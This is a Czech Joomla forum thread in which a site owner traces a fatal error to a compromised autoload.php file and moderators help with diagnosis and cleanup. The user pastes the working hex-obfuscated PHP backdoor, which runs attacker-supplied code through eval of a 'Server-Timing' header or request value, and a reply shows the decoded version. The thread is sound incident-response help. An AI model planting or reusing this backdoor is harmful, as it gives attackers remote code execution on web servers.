Přihlásit se

nefunkční stránky

28. zář 2021 17:13 #144868
nefunkční stránky od Jan
Uživatel
Dobrý den,

něvěděl byste prosím někdo co s tím? Náhle stránky nefungují. Nedělal jsem žádné aktualizace ani změny. Zobrazuje se pouze chybová hláška:

Fatal error: Call to undefined function getallheaders() in /data/web/virtuals/89067/virtual/www/libraries/vendor/autoload.php on line 1


Ve Wedosu říkají, že na jejich straně žádná chyba není.

Děkuji za případnou radu.

28. zář 2021 20:55 - 28. zář 2021 20:58 #144871
Odpověď od Ernst
Joomla Expert
Možností je mnoho.
Možná by trochu pomohl odkaz na ty stránky s chybou.
Nedělal wedos třeba změnu PHP? Opravdu jste neaktualizoval jste joomlu nebo nějaké její rozšíření?
Nenahrával jste nějaký obsah pomocí ftp?
Zapněte si hlášení chyb na "Vývoj" v konfiguraci joomla a zkuste, co vám to bude psát navíc.

29. zář 2021 01:25 #144874
Odpověď od Cony
Moderátor

Jan napsal: Fatal error: Call to undefined function getallheaders() in /data/web/virtuals/89067/virtual/www/libraries/vendor/autoload.php on line 1

V souboru libraries/vendor/autoload.php volání této funkce standardně není. Zkontroloval bych tedy primárně, jestli nemáte stránky napadené.

29. zář 2021 10:53 #144878
Odpověď od Jan
Uživatel
Děkuji za odpověď.

právě, že jsem na těch stránkách nedělal půl roku vůbec nic a šlapou léta. Ještě jsem znovu napsal do Wedosu, aby mi potvrdili, že neprováděli žádnou změnu, ale to by mi asi řekli rovnou (koukali se na to přes FTP). Mám PHP 5.4, které by prý bylo vhodné aktualizovat (ale tím by to být němělo).

Je to doména www.jankostka.cz

Do administrace Joomly se klasicky nedostanu, takže hlášení chyb na "vývoj" nevím, kde bych zapnul.

29. zář 2021 10:55 #144879
Odpověď od Jan
Uživatel
Existuje nějaký nástroj, kterým bych zkontroloval napadení webu? Děkuji

29. zář 2021 11:52 #144880
Odpověď od Cony
Moderátor
PHP 5.4? A verze Joomly? S kontrolou bych začal tak, že bych si přes FTP prohlédl ten soubor libraries/vendor/autoload.php,
popř. porovnal s originálem z instalačky.

29. zář 2021 14:16 - 29. zář 2021 14:50 #144884
Odpověď od Jan
Uživatel
Na soubor autoload.php jsem se kouknul hned jako první, ale bohužel nemám znalosti, abych posoudil jestli je v pořádku. Rád bych ho porovnal s originálem, ale bez administračního rozhraní nevím jak zjistit přesnou verzi Joomla. V tom souboru je tohle:

<?php $_HEADERS = getallheaders();if(isset($_HEADERS)){$c="<\x3f\x70h\x70\x20@\x65\x76a\x6c\x28$\x5f\x52E\x51\x55E\x53\x54[\x22\x53e\x72\x76e\x72\x2dT\x69\x6di\x6e\x67\"\x5d\x29;\x40\x65v\x61\x6c(\x24\x5fH\x45\x41D\x45\x52S\x5b\x22S\x65\x72v\x65\x72-\x54\x69m\x69\x6eg\x22\x5d)\x3b";$f='.'.time();@file_put_contents($f, $c);@include($f);@unlink($f);}


// autoload.php @generated by Composer

require_once __DIR__ . '/composer' . '/autoload_real.php';

return ComposerAutoloaderInit205c915b9c7d3e718e7c95793ee67ffe::getLoader();

29. zář 2021 14:24 #144885
Odpověď od Cony
Moderátor
A to tam právě nemá co dělat. Konkrétně u tohoto souboru se obsah nezměnil snad nikdy, takže lze porovnat z jakoukoliv verzí Joomly. Je to kód, kterým Vám na serveru spustí jakýkoliv kód. Štěstí v neštěstí máte v tom, že Váš server neumí funkcí getallheaders, proto to padá, místo aby to škodilo. I tak ale máte web zavirován.

29. zář 2021 14:31 - 29. zář 2021 14:34 #144886
Odpověď od Bong
Moderátor
Ten soubor by měl začínat:

Code:
<?php // autoload.php @generated by Composer require_once __DIR__ . '/composer/autoload_real.php';

řekl bych, že máte problém...

Verzi Joomly zjistíte třeba tak, že si obrazíte soubor: vasedomena.cz/administrator/manifests/files/joomla.xml

Hacknutou Joomlu opravíte takto:
www.bongovo.cz/joomla/40-jak-zachranit-hacknutou-joomlu

Joomlu opravíte takto:
www.joomlaportal.cz/jak-zacit/632-univer...ava-instalace-joomly

I'm sorry, my responses are limited...you must ask the right questions.

29. zář 2021 14:36 #144887
Odpověď od Jan
Uživatel
Tak super, aspoň už víme kde je chyba. Je tedy zajímavé, že část kodu se objevila až po klasickém zkopírování Ctrl C+V jinak vidět není. Tak já to zkusím dát do původního stavu a snad se to rozběhne. Zatím děkuji moc

29. zář 2021 22:28 #144898
Odpověď od Cony
Moderátor
Kód bude mít na začátku hromadu mezer, nebo tabelátorů, při rychlém náhledu je pak "za rohem" a není na první pohled vidět.

Každopádně je ale potřeba zjistit, jak k hacku došlo, vše aktualizovat, změnit všechny hesla, jinak to tam máte za chvíli zpět.

Pokud máte na webu uživatele, měl by jste také teoreticky informovat ÚOOZ o možném úniku dat uživatelů...

30. zář 2021 09:46 #144900
Odpověď od Ernst
Joomla Expert

Jan napsal: Existuje nějaký nástroj, kterým bych zkontroloval napadení webu? Děkuji


zkuste sitecheck.sucuri.net/

ale u vás to ani nedoběhne, tak je problém asi větší

30. zář 2021 09:55 #144901
Odpověď od Ernst
Joomla Expert
na začátku toho php máte vlastně tenhle kód
Code:
?php @eval($_REQUEST["Server-Timing\"]); @eval($_HEADERS["Server-Timing"]);

30. zář 2021 10:42 #144902
Odpověď od Jan
Uživatel
Tak jsem to začal čistit ručně podle chybových hlášek. Vždy jsem soubor porovnal s novou instalací a vymazal škodlivý kód.
Když jsem opravil jeden soubor, tak se to seklo na dalším souboru atd. Což bylo fajn, alespoň jsem věděl, kde to je. Ale po vyčištění asi pátého souboru už žádná chybová hláška nepřišla a objevila se jenom prázdná obrazovka. A jsem v koncích.
Podle vašich odkazů pokud není k dispozici záloha je potřeba to čistit ručně (záloha k dispozici není). Neexistuje třeba nějaký opravný balíček, který by to přeinstaloval, nebo tak něco? Je to tedy Joomla 3.6.5.

30. zář 2021 12:20 #144905
Odpověď od Cony
Moderátor
"Opravný" balíček je plná instalačka Joomly. Ale ani to není celé řešení, protože tím jen přepíšete soubory jádra, které možná nějaký hack obsahují, ale nevyřešíte tím
- soubory dalších rozšíření (tam by pomohla reinstalace těch rozšíření)
- ale hlavně ne soubory, které jsou tam navíc - tj. soubory, které hack přidal a standardně v Joomle nejsou.

Pokud se necítíte na pročišťování, spíš bych udělal to, že bych si někde vedle nainstaloval znovu čistou Joomlu 3.6.5, se všemi rozšířeními a šablonami co tam máte, a pak bych zaměnil databázi za to z té živé instalace. Nakonec překopírovat složku images,
ale před tím ji ještě pročistit od všeho co tam nepatří (hlavně soubory *.php a .htaccess).

A pak samozřejmě vše zaktualizovat, problém bude právě ta Joomla 3.6.5 - pokud se nepletu tak někde kolem této verze byla právě chyba, která umožňovala útočníkům nahrávat soubory. No a anakonec změnit všechna hesla (Databáze, FTP, admin, uživatelé...)
Poděkovali: Jan

Powered by Fórum